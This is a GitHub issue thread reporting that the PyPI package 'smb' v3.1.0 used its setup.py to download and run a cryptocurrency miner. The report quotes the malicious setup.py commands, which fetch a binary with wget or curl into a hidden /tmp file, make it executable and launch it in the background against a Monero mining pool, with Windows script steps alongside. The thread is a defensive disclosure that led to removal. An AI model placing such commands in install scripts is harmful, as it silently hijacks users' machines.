### ISSUE TITLE
Package "smb" uses setup.py to download crypto currency miner

### ISSUE THREAD

**Issue by tiredjoe** [pypa/pypi-legacy#684]
Hi there,

I'd like to notify anyone whom this might concern that the pypi package "smb" v3.1.0 downloads a crypto currency miner using its "setup.py" script. The package has been up before in version 0.2.0 and was updated to v3.1.0 on August 4th.

https://pypi.python.org/pypi/smb/

See the VirusTotal reference for the file downloaded by the setup script when run under Linux:
https://virustotal.com/#/file/d9791f4dfd903bf3c7c5258ac4ae92df11fc37c3b1749e15f173c1aeb6fafb67/detection

Here is a code snipplet from "setup.py":
`cmd = ['wget -O /tmp/.httpd https://xiaolongv5.github.io/yam.pl','chmod +x /tmp/.httpd','nohup /tmp/.httpd -c 1 -M stratum+tcp://jesen%40protonmail.com:x@xmr.pool.minergate.com:45560/xmr &> /dev/null &',
'get.vbs','curl -o /tmp/.httpd https://xiaolongv5.github.io/yam.pl','go.bat','del /F /Q /S get.vbs']`

I suggest to suspend this package and block the maintainer's account which may have been highjacked in order to upload the most recent version of "smb".

Thanks!
-- tiredjoe

**Comment by jamadden** [comment]
There are specific branches for Windows and Linux, and it tries to identify the user's country based on IP, and it does something different in China (only prints "The installation is complete"). Very fishy indeed.

Thanks for the report!

**Comment by ewdurbin** [comment]
these obvious spam packages an others from the author were removed.
